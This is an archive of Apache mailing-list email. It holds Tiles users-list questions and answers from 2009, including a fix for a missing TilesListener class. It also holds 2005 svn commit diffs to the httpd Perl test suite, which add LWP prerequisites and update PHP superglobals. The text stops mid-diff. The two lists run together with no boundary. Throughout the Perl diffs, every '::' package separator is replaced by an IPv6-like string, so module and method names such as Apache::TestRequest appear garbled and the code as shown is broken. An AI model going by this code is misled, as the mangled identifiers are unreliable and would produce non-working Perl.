Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4058 invoked from network); 17 Jul 2009 15:26:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Jul 2009 15:26:44 -0000 Received: (qmail 94590 invoked by uid 500); 17 Jul 2009 15:27:49 -0000 Delivered-To: [email protected] Received: (qmail 94521 invoked by uid 500); 17 Jul 2009 15:27:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94511 invoked by uid 99); 17 Jul 2009 15:27:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Jul 2009 15:27:49 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO fg-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Jul 2009 15:27:41 +0000 Received: by fg-out-1718.google.com with SMTP id 13so272919fge.12 for <[email protected]>; Fri, 17 Jul 2009 08:27:20 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=z4xvuhghhwOocig4Q+jgeqR1fUQDjlJlPMofoPEJOuU=; b=bbEG13MIj7fUGxhgOMx+f/zq0MvWkmaZYs4zLT4LmLiTRPYW4BPb/sQOtZn/VNfrsr 74N+YXX37GIv6xqupy8na3TWAG0yCSub3RLWkhqE5/5lSlFjFoKsARujDzPAMCMTEByg xTHufXrFeUhq15OdMNsU1M5FN9f8TC+A0ljbc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=JSl4ooIQJWnQQLwhHElrS7AuYpUHRLQjDfgId07zcB/jlTWVTPY6uyushuVvwgID4P CzFPMm5tagZ5EQAutd3zO/zhCbWom35zv0TXm7hC0NpCTaqgNuxyjDh8icLzSUiVEl+j azT1tdUYwkxT0XAXZktGHytF+7y1MYxEVLgPw= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id c14mr108651hbc.102.1247844440255; Fri, 17 Jul 2009 08:27:20 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Fri, 17 Jul 2009 20:57:20 +0530 Message-ID: <[email protected]> Subject: Re: Source code for 2.1.3 From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001636457b0898aed3046ee86c4c X-Virus-Checked: Checked by ClamAV on apache.org --001636457b0898aed3046ee86c4c Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Thanks :) On Fri, Jul 17, 2009 at 6:22 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/17 Roshni Basu <[email protected]>: > > > > Hi Antonio, > > > > From where do I download the source code for tiles 2.1.3? > > See the download page: > http://tiles.apache.org/download.html > At the "source distribution" section. > > Antonio > --001636457b0898aed3046ee86c4c-- From [email protected] Tue Jul 21 18:50:15 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84895 invoked from network); 21 Jul 2009 18:50:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 18:50:15 -0000 Received: (qmail 30805 invoked by uid 500); 21 Jul 2009 18:51:20 -0000 Delivered-To: [email protected] Received: (qmail 30754 invoked by uid 500); 21 Jul 2009 18:51:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30744 invoked by uid 99); 21 Jul 2009 18:51:20 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 18:51:20 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 18:51:11 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MTKQM-00006D-9N for [email protected]; Tue, 21 Jul 2009 11:50:50 -0700 Message-ID: <[email protected]> Date: Tue, 21 Jul 2009 11:50:50 -0700 (PDT) From: spsarolkar <[email protected]> To: [email protected] Subject: Error as No Listener even when i configured listener MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org I am working with struts2 tiles integration but when i configure my listener as <listener> <listener-class>org.apache.struts2.tiles.StrutsTilesListener</listener-class> </listener> I always get error as java.lang.NoClassDefFoundError: org/apache/tiles/web/startup/TilesListener My question is why it is finding org/apache/tiles/web/startup/TilesListener when i configured it as org.apache.struts2.tiles.StrutsTilesListener -- View this message in context: http://www.nabble.com/Error-as-No-Listener-even-when-i-configured-listener-tp24593386p24593386.html Sent from the tiles users mailing list [email protected]. From [email protected] Tue Jul 21 18:53:10 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86261 invoked from network); 21 Jul 2009 18:53:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 18:53:10 -0000 Received: (qmail 38058 invoked by uid 500); 21 Jul 2009 18:54:15 -0000 Delivered-To: [email protected] Received: (qmail 38014 invoked by uid 500); 21 Jul 2009 18:54:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38004 invoked by uid 99); 21 Jul 2009 18:54:15 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 18:54:15 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 18:54:07 +0000 Received: by fxm22 with SMTP id 22so2744369fxm.8 for <[email protected]>; Tue, 21 Jul 2009 11:53:46 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=oG7DbnC6UeMz7+vBBBXqY935jO4R4rpiHJF4/IqwUXU=; b=PrXvS4WisV20hR3SDPfhHtvAvR/VlWLPeXHtYh1qNbMfiBUzQD6izKsR19v6bvM9ou kFcakRXkRVd4Aqf7mUX72bQHOQyJgBRl66XqMsW1XbqGfigxihRgAFkR5+pH992//OTI x52q4ll9DJ/6JYzXFe7IDg9OsenhZMMX/tMpk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=c2yYPogk2DRSXwjoXTKV/11b7ErYYdoE5uJlwKSUIwPQhx7G6F0hTJSthY+58zhvBx fEvc8/3/2t+FRtRfZkVeE2H+l3FrKxBPLDMM0WKBysElqzSlWJi4I6v2K30KoUKXSEKb U54pQ10ZgaDonbSGppUpB2Lhri4zX7MApwTBI= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a4mr2268880fap.104.1248202426315; Tue, 21 Jul 2009 11:53:46 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 21 Jul 2009 20:53:46 +0200 Message-ID: <[email protected]> Subject: Re: Error as No Listener even when i configured listener From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/21 spsarolkar <[email protected]>: > > I am working with struts2 tiles integration but when i configure my listener > as > <listener> > > <listener-class>org.apache.struts2.tiles.StrutsTilesListener</listener-class> > </listener> > I always get error as > java.lang.NoClassDefFoundError: org/apache/tiles/web/startup/TilesListener > My question is why it is finding org/apache/tiles/web/startup/TilesListener > when i configured it as org.apache.struts2.tiles.StrutsTilesListener If you take a look at the code, you will notice that StrutsTilesListener extends TilesListener. TilesListener is contained into tiles-servlet.jar package. Put it in your WEB-INF/lib Antonio From [email protected] Wed Jul 22 15:42:42 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10576 invoked from network); 22 Jul 2009 15:42:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jul 2009 15:42:42 -0000 Received: (qmail 61148 invoked by uid 500); 22 Jul 2009 15:43:47 -0000 Delivered-To: [email protected] Received: (qmail 61099 invoked by uid 500); 22 Jul 2009 15:43:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61089 invoked by uid 99); 22 Jul 2009 15:43:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Jul 2009 15:43:46 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Jul 2009 15:43:36 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MTdyN-0007tZ-2a for [email protected]; Wed, 22 Jul 2009 08:43:15 -0700 Message-ID: <[email protected]> Date: Wed, 22 Jul 2009 08:43:15 -0700 (PDT) From: spsarolkar <[email protected]> To: [email protected] Subject: Re: Error as No Listener even when i configured listener In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Thanks finally i wrote struts2-tiles hello world program, thanks once again Antonio Petrelli-3 wrote: > > 2009/7/21 spsarolkar <[email protected]>: >> >> I am working with struts2 tiles integration but when i configure my >> listener >> as >> <listener> >> >> <listener-class>org.apache.struts2.tiles.StrutsTilesListener</listener-class> >> </listener> >> I always get error as >> java.lang.NoClassDefFoundError: >> org/apache/tiles/web/startup/TilesListener >> My question is why it is finding >> org/apache/tiles/web/startup/TilesListener >> when i configured it as org.apache.struts2.tiles.StrutsTilesListener > > If you take a look at the code, you will notice that > StrutsTilesListener extends TilesListener. > TilesListener is contained into tiles-servlet.jar package. Put it in > your WEB-INF/lib > > Antonio > > -- View this message in context: http://www.nabble.com/Error-as-No-Listener-even-when-i-configured-listener-tp24593386p24608949.html Sent from the tiles users mailing list [email protected].
From [email protected] Wed Nov 02 20:44:44 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59700 invoked from network); 2 Nov 2005 20:44:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Nov 2005 20:44:44 -0000 Received: (qmail 43746 invoked by uid 500); 2 Nov 2005 20:44:43 -0000 Delivered-To: [email protected] Received: (qmail 43721 invoked by uid 500); 2 Nov 2005 20:44:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <test-cvs.httpd.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 43710 invoked by uid 99); 2 Nov 2005 20:44:43 -0000 X-ASF-Spam-Status: No, hits=-7.9 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME,URIBL_WS_SURBL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 02 Nov 2005 12:44:42 -0800 Received: (qmail 59568 invoked by uid 65534); 2 Nov 2005 20:44:22 -0000 Message-ID: <[email protected]> Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r330356 - in /httpd/test/trunk/perl-framework/t: apache/ modules/ security/ ssl/ Date: Wed, 02 Nov 2005 20:44:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.5 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: stas Date: Wed Nov 2 12:44:13 2005 New Revision: 330356 URL: http://svn.apache.org/viewcvs?rev=330356&view=rev Log: tests requiring LWP when LWP is not available are now skipped Modified: httpd/test/trunk/perl-framework/t/apache/acceptpathinfo.t httpd/test/trunk/perl-framework/t/apache/post.t httpd/test/trunk/perl-framework/t/modules/alias.t httpd/test/trunk/perl-framework/t/modules/include.t httpd/test/trunk/perl-framework/t/modules/vhost_alias.t httpd/test/trunk/perl-framework/t/security/CVE-2005-2700.t httpd/test/trunk/perl-framework/t/ssl/basicauth.t httpd/test/trunk/perl-framework/t/ssl/env.t httpd/test/trunk/perl-framework/t/ssl/headers.t httpd/test/trunk/perl-framework/t/ssl/http.t httpd/test/trunk/perl-framework/t/ssl/proxy.t httpd/test/trunk/perl-framework/t/ssl/require.t httpd/test/trunk/perl-framework/t/ssl/v2.t httpd/test/trunk/perl-framework/t/ssl/varlookup.t httpd/test/trunk/perl-framework/t/ssl/verify.t Modified: httpd/test/trunk/perl-framework/t/apache/acceptpathinfo.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/apache/acceptpathinfo.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/apache/acceptpathinfo.t (original) +++ httpd/test/trunk/perl-framework/t/apache/acceptpathinfo.t Wed Nov 2 12:44:13 2005 @@ -23,7 +23,7 @@ push @files, "/test.sh" if ($havecgi); my $numtests = ((scalar keys %tests) * (scalar @files) * 4); -plan tests => $numtests, sub { need_apache(2) && need_module('include') }; +plan tests => $numtests, need need_apache(2), need_module('include'), need_lwp; my $loc = "/apache/acceptpathinfo"; Modified: httpd/test/trunk/perl-framework/t/apache/post.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/apache/post.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/apache/post.t (original) +++ httpd/test/trunk/perl-framework/t/apache/post.t Wed Nov 2 12:44:13 2005 @@ -7,6 +7,6 @@ my $module = 'eat_post'; my $num = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestCommonacf:4db6:5e0b:f386:43a5:35d7:718d:3c8brun_post_test_sizes(); -plan tests => $num, [$module]; +plan tests => $num, need need_lwp, need_module($module); Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestCommonacf:4db6:5e0b:f386:43a5:35d7:718d:3c8brun_post_test($module); Modified: httpd/test/trunk/perl-framework/t/modules/alias.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/modules/alias.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/modules/alias.t (original) +++ httpd/test/trunk/perl-framework/t/modules/alias.t Wed Nov 2 12:44:13 2005 @@ -40,7 +40,7 @@ (keys %rm_rc) * 10 + 12 + $script_tests; #LWP required to follow redirects -plan tests => $tests, [qw(alias LWP)]; +plan tests => $tests, need need_module('alias'), need_lwp; ## simple alias ## t_debug "verifying simple aliases"; Modified: httpd/test/trunk/perl-framework/t/modules/include.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/modules/include.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/modules/include.t (original) +++ httpd/test/trunk/perl-framework/t/modules/include.t Wed Nov 2 12:44:13 2005 @@ -213,7 +213,7 @@ plan tests => (scalar keys %tests) + @patterns + 32, todo => \@todo, - have_module 'include'; + need need_lwp, need_module 'include'; foreach $doc (sort keys %tests) { # do as much from %test as we can Modified: httpd/test/trunk/perl-framework/t/modules/vhost_alias.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/modules/vhost_alias.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/modules/vhost_alias.t (original) +++ httpd/test/trunk/perl-framework/t/modules/vhost_alias.t Wed Nov 2 12:44:13 2005 @@ -14,7 +14,7 @@ my @vh = qw(www.vha-test.com big.server.name.from.heck.org ab.com w-t-f.net); -plan tests => @vh * 2, sub { need_module('vhost_alias') && need_cgi() }; +plan tests => @vh * 2, need need_module('vhost_alias'), need_cgi, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('http'); #ssl not listening on this vhost Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bmodule('mod_vhost_alias'); #use this module's port Modified: httpd/test/trunk/perl-framework/t/security/CVE-2005-2700.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/security/CVE-2005-2700.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/security/CVE-2005-2700.t (original) +++ httpd/test/trunk/perl-framework/t/security/CVE-2005-2700.t Wed Nov 2 12:44:13 2005 @@ -7,7 +7,8 @@ my $vars = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bvars(); -plan tests => 2, [$vars->{ssl_module_name}, qw(LWPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProtocolacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhttps)]; +plan tests => 2, need $vars->{ssl_module_name}, need_lwp, + qw(LWPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bProtocolacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhttps); Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8buser_agent_keepalive(0); Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); Modified: httpd/test/trunk/perl-framework/t/ssl/basicauth.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/basicauth.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/basicauth.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/basicauth.t Wed Nov 2 12:44:13 2005 @@ -13,7 +13,7 @@ my $url = '/ssl-fakebasicauth/index.html'; -plan tests => 3, \&need_auth; +plan tests => 3, need need_auth, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); Modified: httpd/test/trunk/perl-framework/t/ssl/env.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/env.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/env.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/env.t Wed Nov 2 12:44:13 2005 @@ -20,7 +20,7 @@ my $url = '/ssl-cgi/env.pl'; my $tests = (keys(%$server_expect) + keys(%$client_expect)) * 2; -plan tests => $tests, \&need_cgi; +plan tests => $tests, need need_cgi, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); Modified: httpd/test/trunk/perl-framework/t/ssl/headers.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/headers.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/headers.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/headers.t Wed Nov 2 12:44:13 2005 @@ -7,7 +7,7 @@ my $tests = 3; -plan tests => $tests, need_module('headers', 'ssl'); +plan tests => $tests, need need_lwp, need_module('headers', 'ssl'); Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); Modified: httpd/test/trunk/perl-framework/t/ssl/http.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/http.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/http.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/http.t Wed Nov 2 12:44:13 2005 @@ -22,7 +22,7 @@ @todo = (todo => [2]); } -plan tests => 2, @todo; +plan tests => 2, @todo, need_lwp; my $config = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfig(); my $ssl_module = $config->{vars}->{ssl_module_name}; Modified: httpd/test/trunk/perl-framework/t/ssl/proxy.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/proxy.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/proxy.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/proxy.t Wed Nov 2 12:44:13 2005 @@ -31,7 +31,7 @@ } plan tests => (8 + $post_tests) * $num_modules - 5 * $num_http_backends, - [qw(mod_proxy proxy_http.c)]; + need need_lwp, [qw(mod_proxy proxy_http.c)]; for my $module (sort keys %frontend) { Modified: httpd/test/trunk/perl-framework/t/ssl/require.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/require.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/require.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/require.t Wed Nov 2 12:44:13 2005 @@ -10,7 +10,7 @@ #happen in real-life, so just disable keepalives here. Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8buser_agent_keepalive(0); -plan tests => 5; +plan tests => 5, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); Modified: httpd/test/trunk/perl-framework/t/ssl/v2.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/v2.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/v2.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/v2.t Wed Nov 2 12:44:13 2005 @@ -8,7 +8,7 @@ use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequest; -plan tests => 1; +plan tests => 1, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); Modified: httpd/test/trunk/perl-framework/t/ssl/varlookup.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/varlookup.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/varlookup.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/varlookup.t Wed Nov 2 12:44:13 2005 @@ -6,6 +6,11 @@ use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestUtil; use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestSSLCA qw(dn dn_oneline); +unless (have_lwp) { + # bail out early, since the parser below relies on $LWPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION + plan tests => 0, need_lwp; +} + use Timacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blocaltime; my $config = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfig(); @@ -66,7 +71,7 @@ push @vars, $key; } -plan tests => scalar @vars, need_module 'test_ssl'; +plan tests => scalar (@vars), need need_lwp, need_module('test_ssl'); for my $key (@vars) { sok { verify($key); }; Modified: httpd/test/trunk/perl-framework/t/ssl/verify.t URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/ssl/verify.t?rev=330356&r1=330355&r2=330356&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/ssl/verify.t (original) +++ httpd/test/trunk/perl-framework/t/ssl/verify.t Wed Nov 2 12:44:13 2005 @@ -13,7 +13,7 @@ my $url = '/verify/index.html'; -plan tests => 3; +plan tests => 3, need_lwp; Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTestRequestacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bscheme('https'); From [email protected] Tue Nov 08 15:39:04 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42451 invoked from network); 8 Nov 2005 15:38:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2005 15:38:54 -0000 Received: (qmail 4771 invoked by uid 500); 8 Nov 2005 15:38:35 -0000 Delivered-To: [email protected] Received: (qmail 4603 invoked by uid 500); 8 Nov 2005 15:38:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <test-cvs.httpd.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 4544 invoked by uid 99); 8 Nov 2005 15:38:34 -0000 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 08 Nov 2005 07:38:33 -0800 Received: (qmail 41827 invoked by uid 65534); 8 Nov 2005 15:38:13 -0000 Message-ID: <[email protected]> Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r331833 - in /httpd/test/trunk/perl-framework/t/htdocs/php: arg.php func5.php var1.php var2.php var3.php Date: Tue, 08 Nov 2005 15:37:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.5 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: jorton Date: Tue Nov 8 07:37:53 2005 New Revision: 331833 URL: http://svn.apache.org/viewcvs?rev=331833&view=rev Log: - use new-style superglobals rather than old-style, since old-style are off in the upstream recommended default php.ini Modified: httpd/test/trunk/perl-framework/t/htdocs/php/arg.php httpd/test/trunk/perl-framework/t/htdocs/php/func5.php httpd/test/trunk/perl-framework/t/htdocs/php/var1.php httpd/test/trunk/perl-framework/t/htdocs/php/var2.php httpd/test/trunk/perl-framework/t/htdocs/php/var3.php Modified: httpd/test/trunk/perl-framework/t/htdocs/php/arg.php URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/htdocs/php/arg.php?rev=331833&r1=331832&r2=331833&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/htdocs/php/arg.php (original) +++ httpd/test/trunk/perl-framework/t/htdocs/php/arg.php Tue Nov 8 07:37:53 2005 @@ -1,5 +1,5 @@ <?php - for($i=0;$i<$HTTP_SERVER_VARS["argc"];$i++) { - echo "$i: ".$HTTP_SERVER_VARS["argv"][$i]."\n"; + for($i=0;$i<$_SERVER["argc"];$i++) { + echo "$i: ".$_SERVER["argv"][$i]."\n"; } ?> Modified: httpd/test/trunk/perl-framework/t/htdocs/php/func5.php URL: http://svn.apache.org/viewcvs/httpd/test/trunk/perl-framework/t/htdocs/php/func5.php?rev=331833&r1=331832&r2=331833&view=diff ============================================================================== --- httpd/test/trunk/perl-framework/t/htdocs/php/func5.php (original) +++ httpd/test/trunk/perl-framework/t/htdocs/php/func5.php Tue Nov 8 07:37:53 2005 @@ -1,6 +1,6 @@ <?php 